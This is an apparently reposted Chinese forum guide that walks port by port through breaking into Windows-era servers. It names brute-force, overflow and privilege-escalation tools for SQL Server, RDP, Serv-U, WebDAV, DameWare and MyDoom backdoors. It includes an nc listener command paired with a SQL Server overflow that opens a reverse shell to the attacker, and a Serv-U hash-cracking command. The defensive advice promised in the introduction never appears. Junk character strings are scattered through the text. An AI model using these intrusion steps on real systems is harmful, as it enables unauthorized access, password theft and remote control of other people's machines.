|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
0 ~+ W0 B# U& U# W
& m* s* M6 L! Z) p! S: g
+ ]! V4 p c1 c 1. 1433端口入侵
- Y# G% A6 e; S9 y9 `
4 o$ E/ P7 t: w5 L, ^ scanport.exe 查有1433的机器 # B: S8 o4 _1 [& u
9 S6 s2 ?0 ]1 w F
SQLScanPass.exe 进行字典暴破(字典是关键) 2 U( Y1 y, D$ W4 C' U' T2 O3 m0 F
) \5 K7 j5 v6 B# @! y 最后 SQLTools.exe入侵 ) i- l9 O: j; Q
* O$ T) h5 m `& s m; w =============================
1 q& B" E. x+ u) `, X! P; c- H; I) _9 D
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 9 N9 W. N+ c$ z
/ c4 f/ l# a* N6 p: f7 @
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
+ i& E, _& o; I. _3 n' N& @
' o" U; [6 S, C+ i (以上反向的,测试成功) , A5 S; X6 Y' d" }; A
9 e# T9 ~& M7 H8 C. ?# v+ w$ M% L sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
, ?2 O, d S$ Y/ H4 u
[8 U7 n0 X: t% R/ I. t$ V 2. 4899端口入侵
$ T' e6 K8 q- `# f
6 U7 k8 U# Y' M* Z7 K# y 用4899过滤器.exe,扫描空口令的机器 `6 j/ e* I. `
' M6 ^( g' b, \& O: X
3. 3899的入侵
) \4 e6 P6 [# p3 l8 Y% x2 u! q
2 m/ D! O, e( E( D 对很早的机器,可以试试3389的溢出(win3389ex.exe) * H% S. y8 z0 V1 x' ^, c
' z1 i, I a8 P& B' [% b" F' s$ Q 对2000的机器,可以试试字典暴破。(tscrack.exe)
7 X5 [5 f) |' t' c# O& j$ U! s - [# o0 }. l! g2 c, S
4. 80入侵 6 v; H0 W1 z& s; [2 a
6 a* b* j" A. |4 ], I 对sp3以前的机器,可以用webdav入侵;
. O3 Q, m; ]9 H' N3 q5 n; X/ r+ ]: f' N8 q, p: e8 P
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
- i7 i7 ?: e' @6 ?( v6 Y) `
( l# v7 K7 |% t8 h 可以利用SQL进行注入。(小榕的注入软件)。 " b! s a9 n* h5 F
: P/ Z/ F3 w. l
5. serv-u入侵(21端口)
, _* p9 E7 ?' k- g1 ^: T0 p
M' E0 X( ~! t1 |1 z- Y: G( b3 ] 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) $ t; L( {7 s1 J* e
# k7 a, J1 g4 L) \$ t 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 3 |% P4 g2 J W$ T6 i6 s
4 ?; Y$ F0 o+ u+ F2 T% S
====================================== 6 M& n* W6 y5 R
* E3 q+ L* v" D0 R$ |
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) + }" a. E+ }) v9 u; Z
2 J, a) @% s3 W0 `; m 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
: }: Y3 y% {) b7 y' X, N% f
+ c# |3 I" V% k& \0 L( T6 h' ]; u" a 6. 554端口
# W" V$ U3 W+ M7 ~/ J0 G* @% A% ]4 p/ Y$ P- k- T; f0 n% a
用real554.exe入侵。 7 L& ~7 d0 z, V! _* W- J
5 @; B6 `6 h, Z9 r% h) Q
7. 6129端口
0 |1 Y |/ g/ h6 }1 c0 C6 M: e; J6 c u0 K- l [4 z) \4 Y" t: K
用DameWare6129.exe入侵。
) Y) f* S8 T2 V: ?( B3 e: o% D& s1 g, }
8. 系统漏洞 & Q! `7 o) o; u9 r
* r, v, R3 D/ @
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
9 v# H" Y/ d6 W7 V- s! q8 `' p3 r" y/ U% B4 a# q5 S
进行溢出入侵。 # u0 p2 U' Q C* D$ g: v% I( O
- e$ e6 w5 b3 _3 E" y 9. 3127等端口
% e) C; ~* m# C! E" k1 @- c7 Z
7 ?& i/ v6 ]' ^5 o 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
$ t @) u; j3 S3 i5 j" a; N# Y# u- R
10. 其他入侵 $ o( R3 i( ?- H' @9 {4 k# [. b6 u" W5 b: ~
2 Q$ G3 C: M1 v3 B" [0 w
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
- l2 @3 c1 `! T, o @
. _' C1 a$ }7 U# l; S转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|